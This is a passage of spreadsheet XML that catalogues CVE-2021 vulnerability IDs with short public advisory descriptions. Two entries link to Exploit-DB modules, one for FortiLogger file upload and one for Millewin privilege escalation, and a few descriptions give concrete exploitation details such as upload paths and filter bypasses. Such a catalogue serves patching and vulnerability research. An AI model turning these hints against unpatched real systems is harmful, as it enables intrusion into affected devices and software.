    <t>Directory traversal in RStudio Shiny Server before 1.5.16 allows attackers to read the application source code, involving an encoded slash.</t>
  </si>
  <si>
    <t>CVE-2021-33740</t>
  </si>
  <si>
    <t>Windows Media Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33741</t>
  </si>
  <si>
    <t>Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33742</t>
  </si>
  <si>
    <t>Windows MSHTML Platform Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33743</t>
  </si>
  <si>
    <t>Windows Projected File System Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33744</t>
  </si>
  <si>
    <t>Windows Secure Kernel Mode Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33745</t>
  </si>
  <si>
    <t>Windows DNS Server Denial of Service Vulnerability This CVE ID is unique from CVE-2021-34442, CVE-2021-34444, CVE-2021-34499.</t>
  </si>
  <si>
    <t>CVE-2021-33746</t>
  </si>
  <si>
    <t>Windows DNS Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-33754, CVE-2021-33780, CVE-2021-34494, CVE-2021-34525.</t>
  </si>
  <si>
    <t>CVE-2021-33749</t>
  </si>
  <si>
    <t>Windows DNS Snap-in Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-33750, CVE-2021-33752, CVE-2021-33756.</t>
  </si>
  <si>
    <t>CVE-2021-3375</t>
  </si>
  <si>
    <t>ActivePresenter 6.1.6 is affected by a memory corruption vulnerability that may result in a denial of service (DoS) or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-33750</t>
  </si>
  <si>
    <t>Windows DNS Snap-in Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-33749, CVE-2021-33752, CVE-2021-33756.</t>
  </si>
  <si>
    <t>CVE-2021-33751</t>
  </si>
  <si>
    <t>Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-34460, CVE-2021-34510, CVE-2021-34512, CVE-2021-34513.</t>
  </si>
  <si>
    <t>CVE-2021-33752</t>
  </si>
  <si>
    <t>Windows DNS Snap-in Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-33749, CVE-2021-33750, CVE-2021-33756.</t>
  </si>
  <si>
    <t>CVE-2021-33753</t>
  </si>
  <si>
    <t>Microsoft Bing Search Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33754</t>
  </si>
  <si>
    <t>Windows DNS Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-33746, CVE-2021-33780, CVE-2021-34494, CVE-2021-34525.</t>
  </si>
  <si>
    <t>CVE-2021-33755</t>
  </si>
  <si>
    <t>Windows Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-33758.</t>
  </si>
  <si>
    <t>CVE-2021-33756</t>
  </si>
  <si>
    <t>Windows DNS Snap-in Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-33749, CVE-2021-33750, CVE-2021-33752.</t>
  </si>
  <si>
    <t>CVE-2021-33757</t>
  </si>
  <si>
    <t>Windows Security Account Manager Remote Protocol Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33758</t>
  </si>
  <si>
    <t>Windows Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-33755.</t>
  </si>
  <si>
    <t>CVE-2021-33759</t>
  </si>
  <si>
    <t>Windows Desktop Bridge Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3376</t>
  </si>
  <si>
    <t>An issue was discovered in Cuppa CMS Versions Before 31 Jan 2021 allows authenticated attackers to gain escalated privileges via a crafted POST request using the user_group_id_field parameter.</t>
  </si>
  <si>
    <t>CVE-2021-33760</t>
  </si>
  <si>
    <t>Media Foundation Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33761</t>
  </si>
  <si>
    <t>Windows Remote Access Connection Manager Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33773, CVE-2021-34445, CVE-2021-34456.</t>
  </si>
  <si>
    <t>CVE-2021-33762</t>
  </si>
  <si>
    <t>Azure CycleCloud Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36943.</t>
  </si>
  <si>
    <t>CVE-2021-33763</t>
  </si>
  <si>
    <t>Windows Remote Access Connection Manager Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-34454, CVE-2021-34457.</t>
  </si>
  <si>
    <t>CVE-2021-33764</t>
  </si>
  <si>
    <t>Windows Key Distribution Center Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33765</t>
  </si>
  <si>
    <t>Windows Installer Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33766</t>
  </si>
  <si>
    <t>CVE-2021-33767</t>
  </si>
  <si>
    <t>Open Enclave SDK Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33768</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-34470, CVE-2021-34523.</t>
  </si>
  <si>
    <t>CVE-2021-3377</t>
  </si>
  <si>
    <t>The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.</t>
  </si>
  <si>
    <t>CVE-2021-33771</t>
  </si>
  <si>
    <t>Windows Kernel Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31979, CVE-2021-34514.</t>
  </si>
  <si>
    <t>CVE-2021-33772</t>
  </si>
  <si>
    <t>Windows TCP/IP Driver Denial of Service Vulnerability This CVE ID is unique from CVE-2021-31183, CVE-2021-34490.</t>
  </si>
  <si>
    <t>CVE-2021-33773</t>
  </si>
  <si>
    <t>Windows Remote Access Connection Manager Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33761, CVE-2021-34445, CVE-2021-34456.</t>
  </si>
  <si>
    <t>CVE-2021-33774</t>
  </si>
  <si>
    <t>Windows Event Tracing Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33775</t>
  </si>
  <si>
    <t>HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31947, CVE-2021-33776, CVE-2021-33777, CVE-2021-33778.</t>
  </si>
  <si>
    <t>CVE-2021-33776</t>
  </si>
  <si>
    <t>HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31947, CVE-2021-33775, CVE-2021-33777, CVE-2021-33778.</t>
  </si>
  <si>
    <t>CVE-2021-33777</t>
  </si>
  <si>
    <t>HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31947, CVE-2021-33775, CVE-2021-33776, CVE-2021-33778.</t>
  </si>
  <si>
    <t>CVE-2021-33778</t>
  </si>
  <si>
    <t>HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31947, CVE-2021-33775, CVE-2021-33776, CVE-2021-33777.</t>
  </si>
  <si>
    <t>CVE-2021-33779</t>
  </si>
  <si>
    <t>Windows ADFS Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3378</t>
  </si>
  <si>
    <t>FortiLogger 4.4.2.2 is affected by Arbitrary File Upload by sending a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then visiting Assets/temp/hotspot/img/logohotspot.asp.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49600.rb</t>
  </si>
  <si>
    <t>FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (Metasploit)</t>
  </si>
  <si>
    <t>2021-03-01</t>
  </si>
  <si>
    <t>CVE-2021-33780</t>
  </si>
  <si>
    <t>Windows DNS Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-33746, CVE-2021-33754, CVE-2021-34494, CVE-2021-34525.</t>
  </si>
  <si>
    <t>CVE-2021-33781</t>
  </si>
  <si>
    <t>Azure AD Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33782</t>
  </si>
  <si>
    <t>Windows Authenticode Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33783</t>
  </si>
  <si>
    <t>CVE-2021-33784</t>
  </si>
  <si>
    <t>CVE-2021-33785</t>
  </si>
  <si>
    <t>Windows AF_UNIX Socket Provider Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33786</t>
  </si>
  <si>
    <t>Windows LSA Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33788</t>
  </si>
  <si>
    <t>Windows LSA Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-33790</t>
  </si>
  <si>
    <t>The RebornCore library before 4.7.3 allows remote code execution because it deserializes untrusted data in ObjectInputStream.readObject as part of reborncore.common.network.ExtendedPacketBuffer. An attacker can instantiate any class on the classpath with any data. A class usable for exploitation might or might not be present, depending on what Minecraft modifications are installed.</t>
  </si>
  <si>
    <t>CVE-2021-33792</t>
  </si>
  <si>
    <t>Foxit Reader before 10.1.4 and PhantomPDF before 10.1.4 have an out-of-bounds write via a crafted /Size key in the Trailer dictionary.</t>
  </si>
  <si>
    <t>CVE-2021-33793</t>
  </si>
  <si>
    <t>Foxit Reader before 10.1.4 and PhantomPDF before 10.1.4 have an out-of-bounds write because the Cross-Reference table is mishandled during Office document conversion.</t>
  </si>
  <si>
    <t>CVE-2021-33794</t>
  </si>
  <si>
    <t>Foxit Reader before 10.1.4 and PhantomPDF before 10.1.4 allow information disclosure or an application crash after mishandling the Tab key during XFA form interaction.</t>
  </si>
  <si>
    <t>CVE-2021-33795</t>
  </si>
  <si>
    <t>Foxit Reader before 10.1.4 and PhantomPDF before 10.1.4 produce incorrect PDF document signatures because the certificate name, document owner, and signature author are mishandled.</t>
  </si>
  <si>
    <t>CVE-2021-3380</t>
  </si>
  <si>
    <t>Insecure direct object reference (IDOR) vulnerability in ICREM H8 SSRMS allows attackers to disclose sensitive information via the Print Invoice Functionality.</t>
  </si>
  <si>
    <t>CVE-2021-33800</t>
  </si>
  <si>
    <t>In Druid 1.2.3, visiting the path with parameter in a certain function can lead to directory traversal.</t>
  </si>
  <si>
    <t>CVE-2021-33806</t>
  </si>
  <si>
    <t>The BDew BdLib library before 1.16.1.7 for Minecraft allows remote code execution because it deserializes untrusted data in ObjectInputStream.readObject as part of its use of Java serialization.</t>
  </si>
  <si>
    <t>CVE-2021-33807</t>
  </si>
  <si>
    <t>Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.</t>
  </si>
  <si>
    <t>CVE-2021-33813</t>
  </si>
  <si>
    <t>An XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request.</t>
  </si>
  <si>
    <t>CVE-2021-33815</t>
  </si>
  <si>
    <t>dwa_uncompress in libavcodec/exr.c in FFmpeg 4.4 allows an out-of-bounds array access because dc_count is not strictly checked.</t>
  </si>
  <si>
    <t>CVE-2021-33816</t>
  </si>
  <si>
    <t>The website builder module in Dolibarr 13.0.2 allows remote PHP code execution because of an incomplete protection mechanism in which system, exec, and shell_exec are blocked but backticks are not blocked.</t>
  </si>
  <si>
    <t>CVE-2021-33818</t>
  </si>
  <si>
    <t>An issue was discovered in UniFi Protect G3 FLEX Camera Version UVC.v4.30.0.67. Attackers can use slowhttptest tool to send incomplete HTTP request, which could make server keep waiting for the packet to finish the connection, until its resource exhausted. Then the web server is denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2021-3382</t>
  </si>
  <si>
    <t>Stack buffer overflow vulnerability in gitea 1.9.0 through 1.13.1 allows remote attackers to cause a denial of service (crash) via vectors related to a file path.</t>
  </si>
  <si>
    <t>CVE-2021-33820</t>
  </si>
  <si>
    <t>An issue was discovered in UniFi Protect G3 FLEX Camera Version UVC.v4.30.0.67.Attacker could send a huge amount of TCP SYN packet to make web service's resource exhausted. Then the web server is denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2021-33822</t>
  </si>
  <si>
    <t>An issue was discovered on 4GEE ROUTER HH70VB Version HH70_E1_02.00_22. Attackers can use slowhttptest tool to send incomplete HTTP request, which could make server keep waiting for the packet to finish the connection, until its resource exhausted. Then the web server is denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2021-33823</t>
  </si>
  <si>
    <t>An issue was discovered on MOXA Mgate MB3180 Version 2.1 Build 18113012. Attacker could send a huge amount of TCP SYN packet to make web service's resource exhausted. Then the web server is denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2021-33824</t>
  </si>
  <si>
    <t>An issue was discovered on MOXA Mgate MB3180 Version 2.1 Build 18113012. Attackers can use slowhttptest tool to send incomplete HTTP request, which could make server keep waiting for the packet to finish the connection, until its resource exhausted. Then the web server is denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2021-33827</t>
  </si>
  <si>
    <t>The files_antivirus component before 1.0.0 for ownCloud allows OS Command Injection via the administration settings.</t>
  </si>
  <si>
    <t>CVE-2021-33828</t>
  </si>
  <si>
    <t>The files_antivirus component before 1.0.0 for ownCloud mishandles the protection mechanism by which malicious files (that have been uploaded to a public share) are supposed to be deleted upon detection.</t>
  </si>
  <si>
    <t>CVE-2021-33829</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the HTML Data Processor in CKEditor 4 4.14.0 through 4.16.x before 4.16.1 allows remote attackers to inject executable JavaScript code through a crafted comment because --!&gt; is mishandled.</t>
  </si>
  <si>
    <t>CVE-2021-33831</t>
  </si>
  <si>
    <t>api/account/register in the TH Wildau COVID-19 Contact Tracing application through 2021-09-01 has Incorrect Access Control. An attacker can interfere with tracing of infection chains by creating 500 random users within 2500 seconds.</t>
  </si>
  <si>
    <t>CVE-2021-33833</t>
  </si>
  <si>
    <t>ConnMan (aka Connection Manager) 1.30 through 1.39 has a stack-based buffer overflow in uncompress in dnsproxy.c via NAME, RDATA, or RDLENGTH (for A or AAAA).</t>
  </si>
  <si>
    <t>CVE-2021-33838</t>
  </si>
  <si>
    <t>Luca through 1.7.4 on Android allows remote attackers to obtain sensitive information about COVID-19 tracking because requests related to Check-In State occur shortly after requests for Phone Number Registration.</t>
  </si>
  <si>
    <t>CVE-2021-33839</t>
  </si>
  <si>
    <t>Luca through 1.7.4 on Android allows remote attackers to obtain sensitive information about COVID-19 tracking because the QR code of a Public Location can be intentionally confused with the QR code of a Private Meeting.</t>
  </si>
  <si>
    <t>CVE-2021-3384</t>
  </si>
  <si>
    <t>A vulnerability in Stormshield Network Security could allow an attacker to trigger a protection related to ARP/NDP tables management, which would temporarily prevent the system to contact new hosts via IPv4 or IPv6. This affects versions 2.0.0 to 2.7.7, 2.8.0 to 2.16.0, 3.0.0 to 3.7.16, 3.8.0 to 3.11.4, and 4.0.0 to 4.1.5. Fixed in versions 2.7.8, 3.7.17, 3.11.5, and 4.2.0.</t>
  </si>
  <si>
    <t>CVE-2021-33840</t>
  </si>
  <si>
    <t>The server in Luca through 1.1.14 allows remote attackers to cause a denial of service (insertion of many fake records related to COVID-19) because Phone Number data lacks a digital signature.</t>
  </si>
  <si>
    <t>CVE-2021-33841</t>
  </si>
  <si>
    <t>SGE-PLC1000 device, in its 0.9.2b firmware version, does not handle some requests correctly, allowing a remote attacker to inject code into the operating system with maximum privileges.</t>
  </si>
  <si>
    <t>CVE-2021-33842</t>
  </si>
  <si>
    <t>Improper Authentication vulnerability in the cookie parameter of Circutor SGE-PLC1000 firmware version 0.9.2b allows an attacker to perform operations as an authenticated user. In order to exploit this vulnerability, the attacker must be within the network where the device affected is located.</t>
  </si>
  <si>
    <t>CVE-2021-33843</t>
  </si>
  <si>
    <t>Fresenius Kabi Agilia SP MC WiFi vD25 and prior has a default configuration page accessible without authentication. An attacker may use this functionality to change the exposed configuration values such as network settings.</t>
  </si>
  <si>
    <t>CVE-2021-33844</t>
  </si>
  <si>
    <t>A floating point exception (divide-by-zero) issue was discovered in SoX in functon startread() of wav.c file. An attacker with a crafted wav file, could cause an application to crash.</t>
  </si>
  <si>
    <t>CVE-2021-33845</t>
  </si>
  <si>
    <t>The Splunk Enterprise REST API allows enumeration of usernames via the lockout error message. The potential vulnerability impacts Splunk Enterprise instances before 8.1.7 when configured to repress verbose login errors.</t>
  </si>
  <si>
    <t>CVE-2021-33846</t>
  </si>
  <si>
    <t>Fresenius Kabi Vigilant Software Suite (Mastermed Dashboard) version 2.0.1.3 issues authentication tokens to authenticated users that are signed with a symmetric encryption key. An attacker in possession of the key can issue valid JWTs and impersonate arbitrary users.</t>
  </si>
  <si>
    <t>CVE-2021-33847</t>
  </si>
  <si>
    <t>Improper buffer restrictions in firmware for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products before version 22.120 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33848</t>
  </si>
  <si>
    <t>Fresenius Kabi Vigilant Software Suite (Mastermed Dashboard) version 2.0.1.3 is vulnerable to reflected cross-site scripting attacks. An attacker could inject JavaScript in a GET parameter of HTTP requests and perform unauthorized actions such as stealing internal information and performing actions in context of an authenticated user.</t>
  </si>
  <si>
    <t>CVE-2021-33849</t>
  </si>
  <si>
    <t>A Cross-Site Scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user’s browser while the browser is connected to a trusted website. The attack targets your application's users and not the application itself while using your application as the attack's vehicle. The XSS payload executes whenever the user changes the form values or deletes a created form in Zoho CRM Lead Magnet Version 1.7.2.4.</t>
  </si>
  <si>
    <t>CVE-2021-33850</t>
  </si>
  <si>
    <t>There is a Cross-Site Scripting vulnerability in Microsoft Clarity version 0.3. The XSS payload executes whenever the user changes the clarity configuration in Microsoft Clarity version 0.3. The payload is stored on the configuring project Id page.</t>
  </si>
  <si>
    <t>CVE-2021-33851</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.</t>
  </si>
  <si>
    <t>CVE-2021-33852</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Duplicate Title" text box executes whenever the user opens the Settings Page of the Post Duplicator Plugin or the application root page after duplicating any of the existing posts.</t>
  </si>
  <si>
    <t>CVE-2021-33853</t>
  </si>
  <si>
    <t>A Cross-Site Scripting (XSS) attack can cause arbitrary code (javascript) to run in a user’s browser while the browser is connected to a trusted website. As the vehicle for the attack, the application targets the users and not the application itself. Additionally, the XSS payload is executed when the user attempts to access any page of the CRM.</t>
  </si>
  <si>
    <t>CVE-2021-33879</t>
  </si>
  <si>
    <t>Tencent GameLoop before 4.1.21.90 downloaded updates over an insecure HTTP connection. A malicious attacker in an MITM position could spoof the contents of an XML document describing an update package, replacing a download URL with one pointing to an arbitrary Windows executable. Because the only integrity check would be a comparison of the downloaded file's MD5 checksum to the one contained within the XML document, the downloaded executable would then be executed on the victim's machine.</t>
  </si>
  <si>
    <t>CVE-2021-33880</t>
  </si>
  <si>
    <t>The aaugustin websockets library before 9.1 for Python has an Observable Timing Discrepancy on servers when HTTP Basic Authentication is enabled with basic_auth_protocol_factory(credentials=...). An attacker may be able to guess a password via a timing attack.</t>
  </si>
  <si>
    <t>CVE-2021-33881</t>
  </si>
  <si>
    <t>On NXP MIFARE Ultralight and NTAG cards, an attacker can interrupt a write operation (aka conduct a "tear off" attack) over RFID to bypass a Monotonic Counter protection mechanism. The impact depends on how the anti tear-off feature is used in specific applications such as public transportation, physical access control, etc.</t>
  </si>
  <si>
    <t>CVE-2021-33882</t>
  </si>
  <si>
    <t>A Missing Authentication for Critical Function vulnerability in B. Braun SpaceCom2 prior to 012U000062 allows a remote attacker to reconfigure the device from an unknown source because of lack of authentication on proprietary networking commands.</t>
  </si>
  <si>
    <t>CVE-2021-33883</t>
  </si>
  <si>
    <t>A Cleartext Transmission of Sensitive Information vulnerability in B. Braun SpaceCom2 prior to 012U000062 allows a remote attacker to obtain sensitive information by snooping on the network traffic. The exposed data includes critical values for a pump's internal configuration.</t>
  </si>
  <si>
    <t>CVE-2021-33884</t>
  </si>
  <si>
    <t>An Unrestricted Upload of File with Dangerous Type vulnerability in B. Braun SpaceCom2 prior to 012U000062 allows remote attackers to upload any files to the /tmp directory of the device through the webpage API. This can result in critical files being overwritten.</t>
  </si>
  <si>
    <t>CVE-2021-33885</t>
  </si>
  <si>
    <t>An Insufficient Verification of Data Authenticity vulnerability in B. Braun SpaceCom2 prior to 012U000062 allows a remote unauthenticated attacker to send the device malicious data that will be used in place of the correct data. This results in full system command access and execution because of the lack of cryptographic signatures on critical data sets.</t>
  </si>
  <si>
    <t>CVE-2021-33886</t>
  </si>
  <si>
    <t>An improper sanitization of input vulnerability in B. Braun SpaceCom2 prior to 012U000062 allows a remote unauthenticated attacker to gain user-level command-line access by passing a raw external string straight through to printf statements. The attacker is required to be on the same network as the device.</t>
  </si>
  <si>
    <t>CVE-2021-33887</t>
  </si>
  <si>
    <t>Insufficient verification of data authenticity in Peloton TTR01 up to and including PTV55G allows an attacker with physical access to boot into a modified kernel/ramdisk without unlocking the bootloader.</t>
  </si>
  <si>
    <t>CVE-2021-33889</t>
  </si>
  <si>
    <t>OpenThread wpantund through 2021-07-02 has a stack-based Buffer Overflow because of an inconsistency in the integer data type for metric_len.</t>
  </si>
  <si>
    <t>CVE-2021-33894</t>
  </si>
  <si>
    <t>In Progress MOVEit Transfer before 2019.0.6 (11.0.6), 2019.1.x before 2019.1.5 (11.1.5), 2019.2.x before 2019.2.2 (11.2.2), 2020.x before 2020.0.5 (12.0.5), 2020.1.x before 2020.1.4 (12.1.4), and 2021.x before 2021.0.1 (13.0.1), a SQL injection vulnerability exists in SILUtility.vb in MOVEit.DMZ.WebApp in the MOVEit Transfer web app. This could allow an authenticated attacker to gain unauthorized access to the database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database and/or execute SQL statements that alter or delete database elements.</t>
  </si>
  <si>
    <t>CVE-2021-33895</t>
  </si>
  <si>
    <t>ETINET BACKBOX E4.09 and H4.09 mismanages password access control. When a user uses the User ID of the process running BBSV to login to the Backbox UI application, the system procedure (USER_AUTHENTICATE_) used for verifying the Password returns 0 (no error). The reason is that the user is not running the XYGate application. Hence, BBSV assumes the Password is correct. For H4.09, the affected version isT0954V04^AAO. For E4.09, the affected version is 22SEP2020.</t>
  </si>
  <si>
    <t>CVE-2021-33896</t>
  </si>
  <si>
    <t>Dino before 0.1.2 and 0.2.x before 0.2.1 allows Directory Traversal (only for creation of new files) via URI-encoded path separators.</t>
  </si>
  <si>
    <t>CVE-2021-33897</t>
  </si>
  <si>
    <t>A buffer overflow in Synthesia before 10.7.5567, when a non-Latin locale is used, allows user-assisted attackers to cause a denial of service (application crash) via a crafted MIDI file with malformed bytes. This file is mishandled during a deletion attempt. In Synthesia before 10.9, an improper path handling allows local attackers to cause a denial of service (application crash) via a crafted MIDI file with malformed bytes.</t>
  </si>
  <si>
    <t>CVE-2021-33898</t>
  </si>
  <si>
    <t>In Invoice Ninja before 4.4.0, there is an unsafe call to unserialize() in app/Ninja/Repositories/AccountRepository.php that may allow an attacker to deserialize arbitrary PHP classes. In certain contexts, this can result in remote code execution. The attacker's input must be hosted at http://www.geoplugin.net (cleartext HTTP), and thus a successful attack requires spoofing that site or obtaining control of it.</t>
  </si>
  <si>
    <t>CVE-2021-33900</t>
  </si>
  <si>
    <t>While investigating DIRSTUDIO-1219 it was noticed that configured StartTLS encryption was not applied when any SASL authentication mechanism (DIGEST-MD5, GSSAPI) was used. While investigating DIRSTUDIO-1220 it was noticed that any configured SASL confidentiality layer was not applied. This issue affects Apache Directory Studio version 2.0.0.v20210213-M16 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-33903</t>
  </si>
  <si>
    <t>In LCOS 10.40 to 10.42.0473-RU3 with SNMPv3 enabled on LANCOM devices, changing the password of the root user via the CLI does not change the password of the root user for SNMPv3 access. (However, changing the password of the root user via LANconfig does change the password of the root user for SNMPv3 access.)</t>
  </si>
  <si>
    <t>CVE-2021-33904</t>
  </si>
  <si>
    <t>** DISPUTED ** In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS. NOTE: The vendor states "there are configurable security flags and we are unable to reproduce them with the available information."</t>
  </si>
  <si>
    <t>CVE-2021-33907</t>
  </si>
  <si>
    <t>The Zoom Client for Meetings for Windows in all versions before 5.3.0 fails to properly validate the certificate information used to sign .msi files when performing an update of the client. This could lead to remote code execution in an elevated privileged context.</t>
  </si>
  <si>
    <t>CVE-2021-33909</t>
  </si>
  <si>
    <t>fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05.</t>
  </si>
  <si>
    <t>CVE-2021-3391</t>
  </si>
  <si>
    <t>MobileIron Mobile@Work through 2021-03-22 allows attackers to distinguish among valid, disabled, and nonexistent user accounts by observing the number of failed login attempts needed to produce a Lockout error message</t>
  </si>
  <si>
    <t>CVE-2021-33910</t>
  </si>
  <si>
    <t>basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.</t>
  </si>
  <si>
    <t>CVE-2021-33911</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADManager Plus before 7110 allows remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-33912</t>
  </si>
  <si>
    <t>libspf2 before 1.2.11 has a four-byte heap-based buffer overflow that might allow remote attackers to execute arbitrary code (via an unauthenticated e-mail message from anywhere on the Internet) with a crafted SPF DNS record, because of incorrect sprintf usage in SPF_record_expand_data in spf_expand.c. The vulnerable code may be part of the supply chain of a site's e-mail infrastructure (e.g., with additional configuration, Exim can use libspf2; the Postfix web site links to unofficial patches for use of libspf2 with Postfix; older versions of spfquery relied on libspf2) but most often is not.</t>
  </si>
  <si>
    <t>CVE-2021-33913</t>
  </si>
  <si>
    <t>libspf2 before 1.2.11 has a heap-based buffer overflow that might allow remote attackers to execute arbitrary code (via an unauthenticated e-mail message from anywhere on the Internet) with a crafted SPF DNS record, because of SPF_record_expand_data in spf_expand.c. The amount of overflowed data depends on the relationship between the length of an entire domain name and the length of its leftmost label. The vulnerable code may be part of the supply chain of a site's e-mail infrastructure (e.g., with additional configuration, Exim can use libspf2; the Postfix web site links to unofficial patches for use of libspf2 with Postfix; older versions of spfquery relied on libspf2) but most often is not.</t>
  </si>
  <si>
    <t>CVE-2021-3392</t>
  </si>
  <si>
    <t>A use-after-free flaw was found in the MegaRAID emulator of QEMU. This issue occurs while processing SCSI I/O requests in the case of an error mptsas_free_request() that does not dequeue the request object 'req' from a pending requests queue. This flaw allows a privileged guest user to crash the QEMU process on the host, resulting in a denial of service. Versions between 2.10.0 and 5.2.0 are potentially affected.</t>
  </si>
  <si>
    <t>CVE-2021-33923</t>
  </si>
  <si>
    <t>Insecure permissions in Confluent Ansible (cp-ansible) 5.5.0, 5.5.1, 5.5.2 and 6.0.0 allows local attackers to access some sensitive information (private keys, state database).</t>
  </si>
  <si>
    <t>CVE-2021-33924</t>
  </si>
  <si>
    <t>Confluent Ansible (cp-ansible) version 5.5.0, 5.5.1, 5.5.2 and 6.0.0 is vulnerable to Incorrect Access Control via its auxiliary component that allows remote attackers to access sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-33928</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in function pool_installable in src/repo.h in libsolv before 0.7.17 allows attackers to cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-33929</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in function pool_disabled_solvable in src/repo.h in libsolv before 0.7.17 allows attackers to cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-3393</t>
  </si>
  <si>
    <t>An information leak was discovered in postgresql in versions before 13.2, before 12.6 and before 11.11. A user having UPDATE permission but not SELECT permission to a particular column could craft queries which, under some circumstances, might disclose values from that column in error messages. An attacker could use this flaw to obtain information stored in a column they are allowed to write but not read.</t>
  </si>
  <si>
    <t>CVE-2021-33930</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in function pool_installable_whatprovides in src/repo.h in libsolv before 0.7.17 allows attackers to cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-33938</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in function prune_to_recommended in src/policy.c in libsolv before 0.7.17 allows attackers to cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-3394</t>
  </si>
  <si>
    <t>Millennium Millewin (also known as "Cartella clinica") 13.39.028, 13.39.28.3342, and 13.39.146.1 has insecure folder permissions allowing a malicious user for a local privilege escalation.</t>
  </si>
  <si>
    <t>exploits/windows/local/49530.txt</t>
  </si>
  <si>
    <t>Millewin 13.39.146.1 - Local Privilege Escalation</t>
  </si>
  <si>
    <t>CVE-2021-33945</t>
  </si>
  <si>
